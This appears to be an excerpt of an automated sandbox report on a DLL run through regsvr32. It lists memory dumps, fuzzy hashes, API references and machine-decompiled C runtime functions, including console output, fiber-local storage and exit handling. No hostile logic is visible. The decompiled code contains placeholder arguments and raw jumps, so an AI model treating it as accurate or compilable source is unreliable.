Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
Instruction ID: 0829b945d49850770ae31fdd56335e0bb2c082f6fbc814e8141307fbd9247cd0
Opcode Fuzzy Hash: 2fa0da27fe614c465e9bfeef243b6df5757a5299518a3d762b3cf139a2d538dd
Instruction Fuzzy Hash: AE116020B0CE9682FA54677295F11FD22569F4BBB8F148739E96E07AD6DE6CB4818300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14669C24 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFD14669C49
GetProcAddress.KERNEL32 ref: 00007FFD14669C5F
FreeLibrary.KERNEL32 ref: 00007FFD14669C86

Strings

mscoree.dll, xrefs: 00007FFD14669C40
CorExitProcess, xrefs: 00007FFD14669C58

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction ID: b8a514f96cc962178e2c21d06bd04b396a6d47d5a7eb5726581bb42ef1dd582d
Opcode Fuzzy Hash: b9ddca252de5587d32854ed20271dee5b9467b0203a57a46f89d53908150ef97
Instruction Fuzzy Hash: 71F03CA1B18E0395FA148B34E4A43B96360AF8B7B9F540236D96E452F4CF6CD0488300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466EB68 Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00007FFD7FFD1466EB68(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x1466eb9a;
				if (sil >= 0) goto 0x1466eb9a;
				E00007FFD7FFD14671CEC(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x1466ebf1;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x1466ebb5;
				asm("dec eax");
				if (_t42 >= 0) goto 0x1466ebb5;
				E00007FFD7FFD14671CEC(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x1466ebf1;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x1466ebd1;
				asm("dec eax");
				if (_t43 >= 0) goto 0x1466ebd1;
				E00007FFD7FFD14671CEC(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x1466ebf1;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x1466ebf1;
				asm("dec eax");
				if (_t44 >= 0) goto 0x1466ebf1;
				if ((dil & 0x00000010) == 0) goto 0x1466ebee;
				E00007FFD7FFD14671CEC(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x1466ec0b;
				asm("dec eax");
				if (_t46 >= 0) goto 0x1466ec0b;
				E00007FFD7FFD14671CEC(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

APIs

_set_statfp.LIBCMT ref: 00007FFD1466EB90
_set_statfp.LIBCMT ref: 00007FFD1466EBAB
_set_statfp.LIBCMT ref: 00007FFD1466EBC7
_set_statfp.LIBCMT ref: 00007FFD1466EC03

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction ID: d2b3214c6d4acbf28a5a9fbc3acef095818d1017b9e71fc58f325b2f7d03dde3
Opcode Fuzzy Hash: fc2f76716917edeea79f2d35986c40ea1bb698eb9e2e32f596387757052cb74d
Instruction Fuzzy Hash: BA11C1AAF1CE1341F6541178EAF73F915496F9B37CE084635F96F063DACE2CA9494104

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466BB14 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB33
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB52
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB7A
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB8B
FlsSetValue.KERNEL32(?,?,?,00007FFD14669403,?,?,00000000,00007FFD1466969E,?,?,?,?,?,00007FFD1466962A), ref: 00007FFD1466BB9C

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
Instruction ID: 5ac526b42cdc3cb4d990a691513c5cb1324ed6e563eb7ec1c1493639355da360
Opcode Fuzzy Hash: 8052eee4b0d8af64d03de27b504a711c4d5b3c24d31682e890b399a3a393ee09
Instruction Fuzzy Hash: 5A117F60F0CE5682FA58A73299F22F9514A5F47BB8F148734E87D077DADE2CB5818340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466B9A8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFD1466B9B9
FlsSetValue.KERNEL32 ref: 00007FFD1466B9D8
FlsSetValue.KERNEL32 ref: 00007FFD1466BA00
FlsSetValue.KERNEL32 ref: 00007FFD1466BA11
FlsSetValue.KERNEL32 ref: 00007FFD1466BA22

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
Instruction ID: e38c76d064e4b2e7f9ed042864219daae1cd38a03fcc49a039449f1334c76d62
Opcode Fuzzy Hash: 42504d049ca0b81dd607a4491970e33291414fa471f24a262c13f0c89c120e85
Instruction Fuzzy Hash: CF111E50F0CE5782F968A73298F22F911418F57B7CF184739E83E0A6D7DD2CB4829244

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14670958 Relevance: 6.3, APIs: 4, Instructions: 305
fileCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFD7FFD14670958(void* __ecx, signed int __edx, void* __esi, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t181;
				signed int _t186;
				signed int _t193;
				signed int _t198;
				void* _t212;
				signed char _t213;
				void* _t263;
				signed long long _t264;
				signed long long _t267;
				long long _t269;
				signed long long _t271;
				long long _t276;
				long long _t278;
				long long _t280;
				intOrPtr* _t289;
				intOrPtr _t294;
				long long _t295;
				long long _t318;
				void* _t326;
				long long _t327;
				void* _t328;
				long long _t329;
				long long _t331;
				signed char* _t332;
				signed char* _t333;
				signed char* _t334;
				intOrPtr* _t335;
				void* _t336;
				void* _t337;
				signed long long _t338;
				intOrPtr _t341;
				signed long long _t343;
				void* _t345;
				intOrPtr* _t347;
				intOrPtr _t351;
				signed long long _t356;
				signed long long _t359;
				signed long long _t361;
				void* _t364;
				long long _t365;
				long long _t367;
				char _t368;
				void* _t372;
				signed char* _t373;
				signed long long _t375;

				_t263 = _t337;
				_t336 = _t263 - 0x57;
				_t338 = _t337 - 0xe0;
				 *((long long*)(_t336 - 9)) = 0xfffffffe;
				 *((long long*)(_t263 + 8)) = __rbx;
				_t264 =  *0x146de008; // 0x9aee6e3408a0
				 *(_t336 + 0x17) = _t264 ^ _t338;
				 *((long long*)(_t336 - 0x49)) = __r8;
				_t289 = __rcx;
				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
				 *((long long*)(_t336 - 0x51)) = _t367;
				 *(_t336 - 0x19) = __edx;
				_t267 = __edx >> 6;
				 *(_t336 - 0x59) = _t267;
				 *(_t336 - 0x11) = __edx;
				_t375 = __edx + __edx * 8;
				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
				 *((long long*)(_t336 - 0x29)) = _t269;
				r12d = r9d;
				_t365 = _t364 + __r8;
				 *((long long*)(_t336 - 0x71)) = _t365;
				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x146709f8;
				0x14669140();
				_t294 =  *((intOrPtr*)(_t367 + 0x18));
				r8d =  *(_t294 + 0xc);
				 *(_t336 - 0x5d) = r8d;
				 *((long long*)(__rcx)) = _t269;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x14670db8;
				_t271 = __edx >> 6;
				 *(_t336 - 0x21) = _t271;
				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
				r12d = 1;
				if (r8d != 0xfde9) goto 0x14670bc0;
				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t271 * 8));
				if ( *_t347 == dil) goto 0x14670a74;
				_t372 = _t329 + 1;
				if (_t372 - 5 < 0) goto 0x14670a61;
				if (_t372 == 0) goto 0x14670b52;
				r12d =  *((char*)(_t294 + 0x7ffd146de8f0));
				r12d = r12d + 1;
				_t181 = r12d - 1;
				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
				_t341 = _t181;
				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x14670d27;
				_t295 = _t329;
				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
				if (_t295 + 1 - _t372 < 0) goto 0x14670ab9;
				if (_t341 <= 0) goto 0x14670aea;
				E00007FFD7FFD146664D0( *( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
				_t318 = _t329;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
				if (_t318 + 1 - _t372 < 0) goto 0x14670aed;
				 *((long long*)(_t336 - 0x41)) = _t329;
				_t276 = _t336 - 1;
				 *((long long*)(_t336 - 0x39)) = _t276;
				_t186 = (0 | r12d == 0x00000004) + 1;
				r12d = _t186;
				r8d = _t186;
				 *((long long*)(_t338 + 0x20)) = _t367;
				E00007FFD7FFD14671744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
				if (_t276 == 0xffffffff) goto 0x14670db8;
				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
				goto 0x14670c55;
				_t368 =  *((char*)(_t276 + 0x7ffd146de8f0));
				_t212 = _t368 + 1;
				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
				if (_t212 - _t343 > 0) goto 0x14670d55;
				 *((long long*)(_t336 - 0x69)) = _t329;
				 *((long long*)(_t336 - 0x31)) = _t331;
				_t193 = (0 | _t212 == 0x00000004) + 1;
				r14d = _t193;
				r8d = _t193;
				_t278 =  *((intOrPtr*)(_t336 - 0x51));
				 *((long long*)(_t338 + 0x20)) = _t278;
				E00007FFD7FFD14671744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
				if (_t278 == 0xffffffff) goto 0x14670db8;
				_t332 = _t331 + _t368;
				r12d = r14d;
				goto 0x14670c55;
				_t359 =  *(_t336 - 0x59);
				_t351 =  *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t359 * 8));
				_t213 =  *(_t351 + 0x3d + _t375 * 8);
				if ((_t213 & 0x00000004) == 0) goto 0x14670bf7;
				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
				 *((char*)(_t336 + 8)) =  *_t332;
				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
				r8d = 2;
				goto 0x14670c40;
				r8d =  *_t332 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x14670c3a;
				_t373 =  &(_t332[1]);
				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x14670d93;
				r8d = 2;
				if (E00007FFD7FFD1466E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x14670db8;
				_t333 = _t373;
				goto 0x14670c55;
				_t198 = E00007FFD7FFD1466E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
				if (_t198 == 0xffffffff) goto 0x14670db8;
				_t334 =  &(_t333[1]);
				 *((long long*)(_t338 + 0x38)) = _t329;
				 *((long long*)(_t338 + 0x30)) = _t329;
				 *((intOrPtr*)(_t338 + 0x28)) = 5;
				_t280 = _t336 + 0xf;
				 *((long long*)(_t338 + 0x20)) = _t280;
				r9d = r12d;
				_t345 = _t336 - 0x7d;
				E00007FFD7FFD1466D698();
				r14d = _t198;
				if (_t198 == 0) goto 0x14670db8;
				 *((long long*)(_t338 + 0x20)) = _t329;
				r8d = _t198;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x14670db0;
				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x14670db8;
				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x14670d10;
				 *((short*)(_t338 + 0x40)) = 0xd;
				 *((long long*)(_t338 + 0x20)) = _t329;
				_t128 = _t280 - 0xc; // 0x1
				r8d = _t128;
				_t326 = _t338 + 0x40;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x14670db0;
				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x14670db8;
				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x14670db8;
				r8d =  *(_t336 - 0x5d);
				goto 0x14670a23;
				if (_t326 <= 0) goto 0x14670d50;
				_t335 = _t334 - _t373;
				 *((char*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
				if (1 - _t326 < 0) goto 0x14670d2f;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
				goto 0x14670db8;
				if (_t345 <= 0) goto 0x14670d8d;
				_t327 = _t329;
				_t361 =  *(_t336 - 0x19) >> 6;
				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
				 *((char*)( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
				_t328 = _t327 + 1;
				if (2 - _t345 < 0) goto 0x14670d6d;
				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
				goto 0x14670db8;
				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
				 *( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffd14660000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
				_t174 = _t328 + 1; // 0x1
				 *((intOrPtr*)(_t289 + 4)) = _t174;
				goto 0x14670db8;
				 *_t289 = GetLastError();
				return E00007FFD7FFD14663A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
			}

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFD146709DF
WriteFile.KERNEL32 ref: 00007FFD14670CA6
WriteFile.KERNEL32 ref: 00007FFD14670CEF
GetLastError.KERNEL32 ref: 00007FFD14670DB0

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction ID: d373b6b7b99012663f72dcc3340fb4e2b3d432f2fe154d4021bc31fb647a99c4
Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
Instruction Fuzzy Hash: DCD1DF66B08B8189F710CF79D4902EC3BB1EB467ACB148236DE5D97B99CE38E446C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1467129C Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FFD7FFD1467129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed short _v80;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				signed int _v120;
				long long _v128;
				signed int _v136;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed int _t128;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t169;
				signed long long _t182;
				signed long long _t186;
				signed long long _t189;
				signed long long _t208;
				signed int _t209;
				void* _t210;
				void* _t212;
				void* _t228;
				signed long long _t229;
				signed short* _t230;
				void* _t231;
				signed short* _t232;

				_t122 = __ebx;
				r15d = r8d;
				_t186 = __r9;
				_t230 = __rdx;
				if (r8d == 0) goto 0x14671599;
				if (__rdx != 0) goto 0x14671303;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v128 = __r9;
				_v136 = _t209;
				E00007FFD7FFD14669674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
				goto 0x1467159b;
				_t189 = __ecx >> 6;
				_v120 = _t189;
				_t229 = __ecx + __ecx * 8;
				if (_t210 - 1 - 1 > 0) goto 0x14671339;
				if (( !r15d & 0x00000001) == 0) goto 0x146712cc;
				if (( *( *((intOrPtr*)(0x146df940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x1467134f;
				r8d = 0x7ffd146df942;
				E00007FFD7FFD14671E38(r12d);
				_v96 = _t209;
				if (E00007FFD7FFD146716A0(r12d, __ecx) == 0) goto 0x14671485;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x146df940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x14671485;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x14671396;
				0x14669140();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x146713b2;
				_t182 =  *((intOrPtr*)(0x146df940 + _v120 * 8));
				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x14671485;
				if (GetConsoleMode(??, ??) == 0) goto 0x1467147a;
				if (sil == 0) goto 0x14671457;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0x1467151e;
				_t228 = _t230 + _t231;
				_v112 = _t209;
				_t232 = _t230;
				if (_t230 - _t228 >= 0) goto 0x14671514;
				_v80 =  *_t232 & 0x0000ffff;
				_t107 = E00007FFD7FFD14671E40( *_t232 & 0xffff);
				_t128 = _v80 & 0x0000ffff;
				if (_t107 != _t128) goto 0x14671449;
				_t146 = _v108 + 2;
				_v108 = _t146;
				if (_t128 != 0xa) goto 0x1467143a;
				if (E00007FFD7FFD14671E40(0xd) != 0xd) goto 0x14671449;
				_t147 = _t146 + 1;
				_v108 = _t147;
				if ( &(_t232[1]) - _t228 >= 0) goto 0x14671514;
				goto 0x146713fa;
				_v112 = GetLastError();
				goto 0x14671514;
				r9d = r15d;
				_v136 = __r9;
				E00007FFD7FFD14670958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
				asm("movsd xmm0, [eax]");
				goto 0x14671519;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x146df940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x146714e1;
				_t169 = sil;
				if (_t169 == 0) goto 0x146714cd;
				if (_t169 == 0) goto 0x146714b9;
				if (_t147 - 1 != 1) goto 0x14671529;
				r9d = r15d;
				E00007FFD7FFD14670EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x1467146e;
				r9d = r15d;
				E00007FFD7FFD14671004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
				goto 0x1467146e;
				r9d = r15d;
				E00007FFD7FFD14670DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x1467146e;
				r8d = r15d;
				_v136 = _v136 & _t182;
				_v112 = _t182;
				_v104 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x14671511;
				_t116 = GetLastError();
				_v112 = _t116;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_t116 != 0) goto 0x14671592;
				_t117 = _v96;
				if (_t117 == 0) goto 0x14671568;
				if (_t117 != 5) goto 0x14671558;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
				 *((char*)(_t186 + 0x38)) = 1;
				 *(_t186 + 0x34) = _t117;
				goto 0x146712fb;
				_t208 = _t186;
				E00007FFD7FFD1466B3DC(_v96, _t208);
				goto 0x146712fb;
				if (( *( *((intOrPtr*)(0x146df940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x1467157a;
				if ( *_t230 == 0x1a) goto 0x14671599;
				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
				 *((char*)(_t186 + 0x38)) = 1;
				goto 0x146712fb;
				goto 0x1467159b;
				return 0;
			}

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFD1467123C), ref: 00007FFD146713BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFD1467123C), ref: 00007FFD14671449

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction ID: cedf2eea7bff15a1e6d807d6856b11e3e3c71f94a8daa3caeb11b651133e4867
Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction Fuzzy Hash: 0991DCB2B18E52C9FB508F7594E02FD27A2AB07BADF448136DE4E57798CE38D4858710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661CE0 Relevance: 6.1, APIs: 4, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

